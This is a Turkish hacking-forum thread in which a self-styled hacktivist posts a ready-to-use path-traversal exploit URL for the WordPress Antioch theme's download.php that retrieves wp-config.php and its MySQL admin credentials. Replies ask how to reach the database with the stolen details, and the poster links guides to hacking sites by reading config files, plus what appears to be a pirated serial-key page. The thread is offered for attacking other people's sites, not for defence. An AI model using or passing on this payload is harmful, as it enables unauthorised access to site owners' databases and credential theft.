Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Wordpress Antioch Teması Config Dosyası İndirme Açığı + Videolu Anlatım
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,372 / 1,372
Deneyim: 90 / 100
Rep Sayısı: 2766
Mesaj Sayısı: 6321
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Wordpress Antioch Teması Config Dosyası İndirme Açığı + Videolu Anlatım
29.09.2014 12:16



Kod:
Exploitin Orjinal İsmi => Wordpress Antioch Theme Arbitrary File Download
Vulnerability => Türkçesi => WordPress Antioch Teması Rasgele Dosya İndirme Açığı

Uygulanacak Exploit =>
[SİTEİSMİ]/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php

Açıklama site içerisindeki wp-config.php yani sitede MySQL Veritabanın admin kullanıcı adı ve şifresini indiribiliyorsunuz.

Not => revslider.php açığına benzediği için ona göre bir video ekledim
Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 43
Yaşam Puanı: 1,053 / 1,053
Deneyim: 14 / 100
Rep Sayısı: 1056
Mesaj Sayısı: 3021
Üyelik Tarihi: 04.05.2013
      
Yorum: #2
Cvp: Wordpress Antioch Teması Config Dosyası İndirme Açığı + Videolu Anlatım
29.09.2014 12:17
eline sağlık

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti
Sylar
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 2
Yaşam Puanı: 0 / 37
Deneyim: 50 / 100
Rep Sayısı: 0
Mesaj Sayısı: 14
Üyelik Tarihi: 30.01.2015
     
Yorum: #3
Cvp: Wordpress Antioch Teması Config Dosyası İndirme Açığı + Videolu Anlatım
30.01.2015 22:30
Hocam merhaba, peki indirdigimiz config bilgileri ile mysql nasil ulasacagiz ?
Alinti
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,372 / 1,372
Deneyim: 90 / 100
Rep Sayısı:
Mesaj Sayısı: 6321
Üyelik Tarihi: 21.08.2013
     
Yorum: #4
RE: Wordpress Antioch Teması Config Dosyası İndirme Açığı + Videolu Anlatım
30.01.2015 22:58
(30.01.2015 22:30)Sylar Nickli Kullanıcıdan Alıntı:  Hocam merhaba, peki indirdigimiz config bilgileri ile mysql nasil ulasacagiz ?

Forumda bunu çok kez anlattım - İyice araştırmanız lazım.Ama ben yinede hepsini topluyum bir araya siz bakarsınız Smile

Wp-Config.php Görünümü



Bu tür WordPress siteler Nasıl Hacklenir

Wp-Config Okuyarak Hack Resimli Anlatım

Kod:
http://www.cyberizm.org/cyberizm-config-okuyarak-hack-resimli-anlatim.html

Wp-Config Hacking Geniş Anlatım

Kod:
http://www.cyberizm.org/cyberizm-wordpress-config-cekme-okuma-heykleme-ayrintili-anlatim.html

Wp-Config.php Hakkında Geniş bilgi

Kod:
http://www.cyberizm.org/cyberizm-wordpress-mysql-veritabani-wp-config-php-dosyasi.html

Not => Sitelerin Wp-Config.php dosyalarının MySQL Kullanıcı Adı ve Şifresi içermektedir.

Not 2 => EditPlus Programı ile daha kolay rahat görebilirsiniz.
Kod:
www.cyberizm.org/cyberizm-editplus-serial-registration-key-license-key.html
Alinti



1 Ziyaretçi